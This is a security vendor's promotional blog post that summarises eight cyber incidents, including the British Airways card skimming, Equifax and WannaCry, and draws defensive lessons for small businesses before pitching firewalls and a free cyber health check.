8 Disastrous Cyber Attacks All SMEs Should Know About
”It’s good to learn from your mistakes. It’s better to learn from other people’s mistakes.” – Warren Buffett
It’s all well and good talking about cyber-incidents that can happen if you’re not careful. But when it comes down to it, the best lessons come from real-life events.
All of the cyber attacks on this list present very real lessons that all organisations can learn from – regardless of your size or your budget.
22 lines of code. That’s all it took for criminals to steal personal information and payment data from 500,000 BA customers as they booked flights.
Hackers inserted code into the airline’s online payment systems which skimmed customers’ data on the fly (pun most definitely intended). The customers were none the wiser that anything suspicious was afoot because their orders still reached BA as normal, but the code was there – always listening in. The problem arose because BA’s payment page gave access to third-party code without putting appropriate protections in place. Under GDPR, the ICO levied an eye-watering fine of £183m.
What Can We Learn From the British Airways Incident?
Any site that contains a sensitive payment portal should always use a WAF (Web Application Firewall) to monitor traffic patterns and detect any unusual traffic activity. SonicWall’s SMA100 includes a WAF which acts as an intermediary between the open web and your web servers, carrying out packet inspection, data loss prevention, exploit detection, and more.
It’s also worth investing in penetration testing on your website, wherein trustworthy hackers will try to force access to your site’s sensitive systems. Reliable “pentesters” won’t do anything untoward if they do find a way in, they’ll simply let you know where your website’s security blind spots are so you can fix them.
These measures are advisable for any business that receives sensitive payment info or personally identifying data through their website, but they’re especially advisable if you’re particularly well-known or prominent within your niche.
Japanese publisher, Nikkei, suffered a devastating malware attack which resulted in a breach of 12,514 personal records relating to staff and board members. An employee innocently opened an email with an infected attachment, causing the malware to spread throughout the organisation’s network.
Japanese newspaper The Mainichi reported that “it took time [for Nikkei] to detect the anomaly because the virus was of a new type.”
What Can We Learn From the Nikkei Incident?
Every single member of staff who uses an internet-enabled computer should receive thorough phishing and cyber-awareness training. Even without formal training, your team should treat unexpected email or shared files with the highest suspicion.
Many modern firewalls – including SonicWall’s next generation firewalls – provide comprehensive data leak prevention. This function monitors outgoing traffic for potentially sensitive data and stops it in its tracks.
The fight against “new types” of virus is easily solved too. Signature-based detection (where your antivirus software refers to a database of known threats) is becoming increasingly old hat because new dangerous malware threats are released every minute. It’s now much wiser to invest in antivirus tools that use sandboxing, behaviour monitoring, and up to the minute threat intelligence to pre-emptively keep you safe.
Gilead Sciences Inc.
According to publicly-available records, hackers reportedly linked to Iran tried to infiltrate pharmaceutical firm Gilead. The records state that a top Gilead executive was sent a fake phishing-style login page. It’s Gilead company policy not to discuss cybersecurity matters, so reporters are unable to confirm whether the attack was successful or not.
This attack (or perhaps attempted attack) came at a crucial time for drug research worldwide – just a few months into the COVID-19 crisis.
What Can We Learn From the Gilead Incident?
Hopefully this attack was unsuccessful, but it just goes to show that phishing training is essential for all employees who interact with IT; that includes top level management, board members, and C-suite executives. In fact, the higher up the chain of command someone is, the sweeter prospect they become to a cybercriminal. Executives are highly visible and often have access to much more sensitive data than those further down the chain of command. Criminals are therefore likely to target high-profile execs using highly believable spear-phishing attacks.
Marriott Hotels/Marriott International
In 2018, Marriott suffered a crippling data breach that resulted in the theft of highly sensitive personal information across 339 million customer records. The ICO investigated the breach and have proposed a colossal £99.2m fine.
The ICO’s investigations revealed that Starwood hotels group appears to have suffered issues relating to “unauthorised network access” since 2014. Starwood was then acquired by Marriott in 2016.
Marriott International intend to contest the fine and state that the Starwood database affected by the hack was no longer used for business operations.
What Can We Learn From the Marriott Incident?
Any IT that enters your company’s infrastructure needs to be properly vetted for cyber security readiness before connecting it to your network. This is especially important if the devices have been previously used or are in any way “second hand”.
The same goes for data that has been acquired through a purchase, acquisition, or merger. Audit all databases that come under your control – do you really need them? How safely is each database kept? That data is your responsibility now, so the onus is on you to keep it safe.
Do you use IoT (Internet of Things) or SCADA devices in your business? Check out our recent article “Everything You Need to Know About SCADA Cyber Security” for more insight into securing your networked smart devices.
Middlesex London Health Unit
Despite the confusingly British name, this actually happened in Canada. An Ontario-based public health organisation came under scrutiny from the region’s Privacy Commissioner for abandoning numerous laptops, PCs, and other electronics in a storage room following a move to new premises.
Photographs shown by local news show bookcases laden with PCs, laptops, monitors, printers, fax machines and more. It was found that many of the devices still contained personally identifiable health records.
What Can We Learn From the Middlesex London Health Unit Incident?
Keep a detailed log of all of your hardware – no matter how small or inconsequential each device may seem. Note where each device is located, how it connects to your network/the internet, and who is responsible for that device’s safekeeping (especially important if your team works remotely).
Also keep track of what data is usually stored on or accessed by each device too. This way, if one device suddenly disappears, you’ll have a rough idea of what data may possibly be at risk.
When it comes to disposing of devices, always make sure you do so securely. Seek the assistance of a secure IT disposal company rather than letting your gadgets rot in a storage room!
Düsseldorf University Hospital
On a more sombre note, this case highlights the very real, human cost of cybercrime. Criminals instigated a ransomware attack which was not aimed at Düsseldorf University Hospital, but the hospital became seriously affected nonetheless.
The attack stopped the hospital from accepting emergency patients, meaning that one patient had to be diverted to a hospital 20 miles away. The patient later passed away. The investigation is still ongoing at the time of writing, but police may treat the cyberattack as a homicide if this delay is found to have caused the patient’s death.
What Can We Learn From the Düsseldorf University Hospital Incident?
This incident teaches us that cybercrime isn’t just a case of stealing a few ones and zeroes. Cyber attacks can have a wide-reaching impact, possibly one that even the criminals don’t foresee. Good cyber preparedness can save organisations from certain doom, protect livelihoods, and even in cases like these, potentially save lives. This attack wasn’t meant for the hospital but it shows how the spread of malware can easily get out of hand. Unfortunately, healthcare organisations are frequently targeted by cybercriminals, so cyber security is particularly crucial in this sector.
In 2017, hackers stole millions of personally identifying records from Equifax, a credit bureau that assesses people’s credit scores across the globe. Though this attack impacted their US systems, some UK customer data was affected too.
It appears that criminals initially hacked an online customer complaint portal using a known vulnerability that should have been patched (it wasn’t). Once they were “in”, the hackers were able to freely move to other servers as Equifax’s systems weren’t adequately ring-fenced from each other. Hackers were able to find login credentials stored in plain text that helped them breach further systems.
The criminals were able to pull encrypted data out of Equifax’s servers for months without detection. This was because the agency hadn’t renewed a vital security certificate that would have otherwise kept them safe.
And potentially the worst part? Even after this delay, Equifax didn’t go public about the breach until over a month after it was discovered. Top execs also sold off stocks around this time, giving rise to insider trading suspicions.
What Can We Learn From the Equifax Incident?
Use a reliable Web Application Firewall to protect any potentially sensitive web portals, especially if they have links to more sensitive servers and systems. Make IT and data security a top priority – whether that relates to software, firmware, certificate renewals, suggestions from IT security advisors, anything.
Keep your networked and cloud storage repositories protected with appropriate firewalling and data leak prevention tools. Work regularly with penetration testers to root out your online and internal network vulnerabilities and act on their suggestions immediately. And have a complete, documented plan for what to do when things go wrong, including team responsibilities, legal implications, and a PR crisis plan.
The 2017 WannaCry ransomware attack impacted healthcare service so badly that they were left with a £73m IT bill.
However one aspect that stood out to us was the sheer magnitude of older IT in use by the NHS, with 2,300 devices still running XP over 2 years after the attack. That’s only reportedly 0.16% of their whole IT estate, but a weak link is a weak link. It’s thought that these older devices are still in use due to the software they use being incompatible with newer versions of Windows – software that operates large capital expenses like MRI scanners.
What Can We Learn From the WannaCry Incident?
Security firms like us can tell you to get rid of old, unsupported IT until the cows come home, but that doesn’t always reflect a practical reality for a lot of organisations. Sometimes older or insecure devices are needed to carry out business-critical tasks – often relating to Internet of Things devices or compatibility issues.
If you must use EOL (End of Life) or bare-bones networked devices, make sure that they’re connected <em>behind your firewall</em>, not directly to the internet. Firewalls should be replaced every 5 years <em>at least</em> and should include next-gen features like data leak prevention tools, intrusion prevention systems, and a strong heuristic gateway antivirus to keep as-yet unknown threats at bay.
We know that this all sounds like an uphill battle. But it’s surprisingly simple with the right security partners on your side. Reach out to us today and claim your free business cyber health check – it only takes an hour of your time and there’s no pressure to buy anything. Claim yours today!